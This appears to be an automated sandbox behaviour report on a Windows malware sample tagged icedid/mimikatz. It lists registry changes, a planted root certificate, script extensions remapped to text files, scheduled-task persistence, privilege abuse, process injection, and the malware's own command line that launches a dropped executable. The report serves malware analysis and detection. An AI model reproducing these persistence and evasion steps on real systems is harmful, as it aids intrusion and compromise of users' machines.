cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-02-09_94917c3185b5a3e214d99b1fd4db0ba5_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1248 cmd.exe 2256 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral1/files/0x0007000000019470-5.dat nsis_installer_2 behavioral1/files/0x00080000000194eb-15.dat nsis_installer_1 behavioral1/files/0x00080000000194eb-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" reczeebjt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs zyztlgt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ zyztlgt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs zyztlgt.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 zyztlgt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs zyztlgt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\96-49-7d-97-d3-f0\WpadDecision = "0" zyztlgt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" zyztlgt.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\96-49-7d-97-d3-f0\WpadDecisionTime = b00023faca7adb01 zyztlgt.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad zyztlgt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs zyztlgt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot zyztlgt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals reczeebjt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump reczeebjt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA zyztlgt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs zyztlgt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs zyztlgt.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump reczeebjt.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0081000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 zyztlgt.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates zyztlgt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates zyztlgt.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" zyztlgt.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software reczeebjt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump reczeebjt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" reczeebjt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs zyztlgt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust zyztlgt.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed zyztlgt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" zyztlgt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing zyztlgt.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 zyztlgt.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7BD966C8-50EF-4655-B5C7-5DB760F3F2D5}\WpadDecisionTime = b00023faca7adb01 zyztlgt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs zyztlgt.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000004000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0081000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 zyztlgt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" reczeebjt.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump reczeebjt.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings zyztlgt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump reczeebjt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" reczeebjt.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\96-49-7d-97-d3-f0\WpadDetectedUrl zyztlgt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople zyztlgt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs zyztlgt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople zyztlgt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs zyztlgt.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix zyztlgt.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\96-49-7d-97-d3-f0\WpadDecisionTime = 30651433cb7adb01 zyztlgt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs zyztlgt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\96-49-7d-97-d3-f0 zyztlgt.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" reczeebjt.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" zyztlgt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7BD966C8-50EF-4655-B5C7-5DB760F3F2D5}\96-49-7d-97-d3-f0 zyztlgt.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed zyztlgt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7BD966C8-50EF-4655-B5C7-5DB760F3F2D5}\WpadDecision = "0" zyztlgt.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" zyztlgt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ zyztlgt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" zyztlgt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ zyztlgt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" zyztlgt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ zyztlgt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" zyztlgt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ zyztlgt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" zyztlgt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ zyztlgt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ zyztlgt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" zyztlgt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ zyztlgt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" zyztlgt.exe -
Modifies system certificate store 2 TTPs 2 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 zyztlgt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 zyztlgt.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2256 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2136 schtasks.exe 2832 schtasks.exe 2884 schtasks.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
pid Process 1728 zyztlgt.exe 1236 zyztlgt.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe -
Suspicious behavior: LoadsDriver 31 IoCs
pid Process 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2148 2025-02-09_94917c3185b5a3e214d99b1fd4db0ba5_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 2148 2025-02-09_94917c3185b5a3e214d99b1fd4db0ba5_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 2888 zyztlgt.exe Token: SeDebugPrivilege 3020 zyztlgt.exe Token: SeDebugPrivilege 1040 vfshost.exe Token: SeAuditPrivilege 2816 svchost.exe Token: SeDebugPrivilege 2004 reczeebjt.exe Token: SeShutdownPrivilege 2004 reczeebjt.exe Token: SeLockMemoryPrivilege 2472 ugfccu.exe Token: SeLockMemoryPrivilege 2472 ugfccu.exe Token: SeDebugPrivilege 2144 reczeebjt.exe Token: SeShutdownPrivilege 2144 reczeebjt.exe Token: SeDebugPrivilege 2396 reczeebjt.exe Token: SeShutdownPrivilege 2396 reczeebjt.exe Token: SeDebugPrivilege 336 reczeebjt.exe Token: SeShutdownPrivilege 336 reczeebjt.exe Token: SeDebugPrivilege 1248 reczeebjt.exe Token: SeShutdownPrivilege 1248 reczeebjt.exe Token: SeDebugPrivilege 912 reczeebjt.exe Token: SeShutdownPrivilege 912 reczeebjt.exe Token: SeDebugPrivilege 2288 reczeebjt.exe Token: SeShutdownPrivilege 2288 reczeebjt.exe Token: SeDebugPrivilege 868 reczeebjt.exe Token: SeShutdownPrivilege 868 reczeebjt.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2148 2025-02-09_94917c3185b5a3e214d99b1fd4db0ba5_hacktools_icedid_mimikatz.exe 2148 2025-02-09_94917c3185b5a3e214d99b1fd4db0ba5_hacktools_icedid_mimikatz.exe 2888 zyztlgt.exe 2888 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 2344 xohudmc.exe 2892 aaugog.exe 1728 zyztlgt.exe 1728 zyztlgt.exe 1236 zyztlgt.exe 1236 zyztlgt.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2148 wrote to memory of 1248 2148 2025-02-09_94917c3185b5a3e214d99b1fd4db0ba5_hacktools_icedid_mimikatz.exe 29 PID 2148 wrote to memory of 1248 2148 2025-02-09_94917c3185b5a3e214d99b1fd4db0ba5_hacktools_icedid_mimikatz.exe 29 PID 2148 wrote to memory of 1248 2148 2025-02-09_94917c3185b5a3e214d99b1fd4db0ba5_hacktools_icedid_mimikatz.exe 29 PID 2148 wrote to memory of 1248 2148 2025-02-09_94917c3185b5a3e214d99b1fd4db0ba5_hacktools_icedid_mimikatz.exe 29 PID 1248 wrote to memory of 2256 1248 cmd.exe 31 PID 1248 wrote to memory of 2256 1248 cmd.exe 31 PID 1248 wrote to memory of 2256 1248 cmd.exe 31 PID 1248 wrote to memory of 2256 1248 cmd.exe 31 PID 1248 wrote to memory of 2888 1248 cmd.exe 32 PID 1248 wrote to memory of 2888 1248 cmd.exe 32 PID 1248 wrote to memory of 2888 1248 cmd.exe 32 PID 1248 wrote to memory of 2888 1248 cmd.exe 32 PID 3020 wrote to memory of 3016 3020 zyztlgt.exe 34 PID 3020 wrote to memory of 3016 3020 zyztlgt.exe 34 PID 3020 wrote to memory of 3016 3020 zyztlgt.exe 34 PID 3020 wrote to memory of 3016 3020 zyztlgt.exe 34 PID 3016 wrote to memory of 2708 3016 cmd.exe 36 PID 3016 wrote to memory of 2708 3016 cmd.exe 36 PID 3016 wrote to memory of 2708 3016 cmd.exe 36 PID 3016 wrote to memory of 2708 3016 cmd.exe 36 PID 3016 wrote to memory of 2720 3016 cmd.exe 37 PID 3016 wrote to memory of 2720 3016 cmd.exe 37 PID 3016 wrote to memory of 2720 3016 cmd.exe 37 PID 3016 wrote to memory of 2720 3016 cmd.exe 37 PID 3016 wrote to memory of 2848 3016 cmd.exe 38 PID 3016 wrote to memory of 2848 3016 cmd.exe 38 PID 3016 wrote to memory of 2848 3016 cmd.exe 38 PID 3016 wrote to memory of 2848 3016 cmd.exe 38 PID 3016 wrote to memory of 2796 3016 cmd.exe 39 PID 3016 wrote to memory of 2796 3016 cmd.exe 39 PID 3016 wrote to memory of 2796 3016 cmd.exe 39 PID 3016 wrote to memory of 2796 3016 cmd.exe 39 PID 3016 wrote to memory of 2284 3016 cmd.exe 40 PID 3016 wrote to memory of 2284 3016 cmd.exe 40 PID 3016 wrote to memory of 2284 3016 cmd.exe 40 PID 3016 wrote to memory of 2284 3016 cmd.exe 40 PID 3016 wrote to memory of 2680 3016 cmd.exe 41 PID 3016 wrote to memory of 2680 3016 cmd.exe 41 PID 3016 wrote to memory of 2680 3016 cmd.exe 41 PID 3016 wrote to memory of 2680 3016 cmd.exe 41 PID 3020 wrote to memory of 2756 3020 zyztlgt.exe 42 PID 3020 wrote to memory of 2756 3020 zyztlgt.exe 42 PID 3020 wrote to memory of 2756 3020 zyztlgt.exe 42 PID 3020 wrote to memory of 2756 3020 zyztlgt.exe 42 PID 3020 wrote to memory of 2132 3020 zyztlgt.exe 44 PID 3020 wrote to memory of 2132 3020 zyztlgt.exe 44 PID 3020 wrote to memory of 2132 3020 zyztlgt.exe 44 PID 3020 wrote to memory of 2132 3020 zyztlgt.exe 44 PID 3020 wrote to memory of 1780 3020 zyztlgt.exe 46 PID 3020 wrote to memory of 1780 3020 zyztlgt.exe 46 PID 3020 wrote to memory of 1780 3020 zyztlgt.exe 46 PID 3020 wrote to memory of 1780 3020 zyztlgt.exe 46 PID 3020 wrote to memory of 2336 3020 zyztlgt.exe 48 PID 3020 wrote to memory of 2336 3020 zyztlgt.exe 48 PID 3020 wrote to memory of 2336 3020 zyztlgt.exe 48 PID 3020 wrote to memory of 2336 3020 zyztlgt.exe 48 PID 2336 wrote to memory of 1728 2336 cmd.exe 50 PID 2336 wrote to memory of 1728 2336 cmd.exe 50 PID 2336 wrote to memory of 1728 2336 cmd.exe 50 PID 2336 wrote to memory of 1728 2336 cmd.exe 50 PID 2336 wrote to memory of 1728 2336 cmd.exe 50 PID 2336 wrote to memory of 1728 2336 cmd.exe 50 PID 2336 wrote to memory of 1728 2336 cmd.exe 50 PID 1728 wrote to memory of 1516 1728 wpcap.exe 51
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:108
-
C:\Windows\TEMP\fjyenfsri\ugfccu.exe"C:\Windows\TEMP\fjyenfsri\ugfccu.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2472
-
-
C:\Users\Admin\AppData\Local\Temp\2025-02-09_94917c3185b5a3e214d99b1fd4db0ba5_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2025-02-09_94917c3185b5a3e214d99b1fd4db0ba5_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\sivbltti\zyztlgt.exe2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1248 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2256
-
-
C:\Windows\sivbltti\zyztlgt.exeC:\Windows\sivbltti\zyztlgt.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2888
-
-
-
C:\Windows\sivbltti\zyztlgt.exeC:\Windows\sivbltti\zyztlgt.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3020 -
